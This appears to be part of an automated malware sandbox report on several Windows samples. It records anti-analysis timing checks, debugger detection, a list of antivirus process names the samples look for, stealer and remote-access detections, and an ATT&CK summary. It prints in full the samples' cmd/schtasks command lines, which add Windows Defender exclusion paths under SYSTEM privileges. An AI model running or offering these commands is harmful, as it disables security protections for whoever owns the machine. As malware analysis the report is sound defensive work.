              Source: C:\Users\user\Desktop\45631.exeRDTSC instruction interceptor: First address: 140001121 second address: 140001137 instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 dec eax 0x00000004 shl edx, 20h 0x00000007 nop 0x00000008 dec eax 0x00000009 or eax, edx 0x0000000b nop 0x0000000c dec eax 0x0000000d mov ecx, eax 0x0000000f nop 0x00000010 fldpi 0x00000012 nop 0x00000013 frndint 0x00000015 nop 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\45631.exeRDTSC instruction interceptor: First address: 140001137 second address: 140001137 instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 dec eax 0x00000004 shl edx, 20h 0x00000007 nop 0x00000008 dec eax 0x00000009 or eax, edx 0x0000000b nop 0x0000000c dec eax 0x0000000d sub eax, ecx 0x0000000f nop 0x00000010 dec ecx 0x00000011 cmp eax, ecx 0x00000013 nop 0x00000014 jc 00007F30C4EBA786h 0x00000016 fldpi 0x00000018 nop 0x00000019 frndint 0x0000001b nop 0x0000001c rdtsc
              Source: C:\Users\user\Documents\sgH8Ps.exeRDTSC instruction interceptor: First address: 6C7B55 second address: 6C7B63 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\45631.exeDropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
              Source: C:\Users\user\Documents\sgH8Ps.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_6-14069
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_42-3231
              Source: C:\Users\user\Documents\sgH8Ps.exeAPI coverage: 2.7 %
              Source: C:\Users\user\Documents\sgH8Ps.exe TID: 4488Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe TID: 1832Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe TID: 6336Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe TID: 4512Thread sleep count: 42 > 30Jump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe TID: 6336Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_00007FFDA55DA1B8 FindFirstFileExW,6_2_00007FFDA55DA1B8
              Source: C:\Users\user\Documents\sgH8Ps.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeThread delayed: delay time: 30000Jump to behavior
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeThread delayed: delay time: 30000Jump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: 45631.exe, 00000000.00000003.2575241713.0000000000640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Twhtlb.exe, 00000028.00000002.3979769502.000000000120E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Documents\sgH8Ps.exeAPI call chain: ExitProcess graph end nodegraph_6-14070
              Source: C:\Users\user\Documents\sgH8Ps.exeAPI call chain: ExitProcess graph end nodegraph_6-14414
              Source: C:\Users\user\Desktop\45631.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_00000001400073E0 LdrLoadDll,6_2_00000001400073E0
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0000000140007C91
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_000000014000F000
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeCode function: 40_3_05260643 mov eax, dword ptr fs:[00000030h]40_3_05260643
              Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exeCode function: 40_3_05260643 mov eax, dword ptr fs:[00000030h]40_3_05260643
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,6_2_0000000140004630
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0000000140007C91
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000001400106B0
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_00000001400092E0 SetUnhandledExceptionFilter,6_2_00000001400092E0
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_00007FFDA55D2630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FFDA55D2630
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_00007FFDA55D1F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FFDA55D1F50
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_00007FFDA55D76E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FFDA55D76E0
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeCode function: 42_2_005210CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_005210CC
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeCode function: 42_2_00522AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_00522AE2
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeCode function: 42_2_005251FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_005251FB

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\45631.exeNtDelayExecution: Indirect: 0x1F94CFJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeNtAllocateVirtualMemory: Indirect: 0x140006FD0Jump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeNtProtectVirtualMemory: Indirect: 0x2A2B253Jump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeNtProtectVirtualMemory: Indirect: 0x29FB253Jump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess created: C:\Program Files (x86)\Twhtlb\Twhtlb.exe "C:\Program Files (x86)\Twhtlb\Twhtlb.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /fJump to behavior
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_00007FFDA55DFD40 cpuid 6_2_00007FFDA55DFD40
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: GetLocaleInfoA,6_2_000000014000F370
              Source: C:\Program Files (x86)\K5YQV85\6WWeC.exeCode function: GetLocaleInfoA,42_2_00526B1A
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_000000014000A370
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,6_2_0000000140005A70
              Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
              Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: vsserv.exe
              Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avcenter.exe
              Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
              Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avp.exe
              Source: Twhtlb.exe, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360safe.exe
              Source: Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: SuperKiller.exe
              Source: Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msmpeng.exe
              Source: Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: Autoruns.exe
              Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
              Source: Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: mcshield.exe
              Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
              Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
              Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
              Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
              Source: Twhtlb.exe, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Tray.exe
              Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
              Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AYAgent.aye
              Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
              Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
              Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
              Source: Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Mcshield.exe
              Source: sgH8Ps.exe, 00000006.00000002.2761930913.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3981945579.0000000003A5D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 40.2.Twhtlb.exe.2d603e8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 40.2.Twhtlb.exe.10000000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 40.2.Twhtlb.exe.2d603e8.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Twhtlb.exe PID: 3744, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 40.2.Twhtlb.exe.2d603e8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 40.2.Twhtlb.exe.10000000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 40.2.Twhtlb.exe.2d603e8.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Twhtlb.exe PID: 3744, type: MEMORYSTR
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,6_2_00000001400042B0
              Source: C:\Users\user\Documents\sgH8Ps.exeCode function: 6_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,6_2_0000000140003F80
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Native API
              1
              DLL Side-Loading
              1
              Abuse Elevation Control Mechanism
              1
              Disable or Modify Tools
              1
              Credential API Hooking
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts113
              Command and Scripting Interpreter
              33
              Windows Service
              1
              DLL Side-Loading
              1
              Abuse Elevation Control Mechanism
              LSASS Memory4
              File and Directory Discovery
              Remote Desktop Protocol1
              Credential API Hooking
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts11
              Scheduled Task/Job
              11
              Scheduled Task/Job
              1
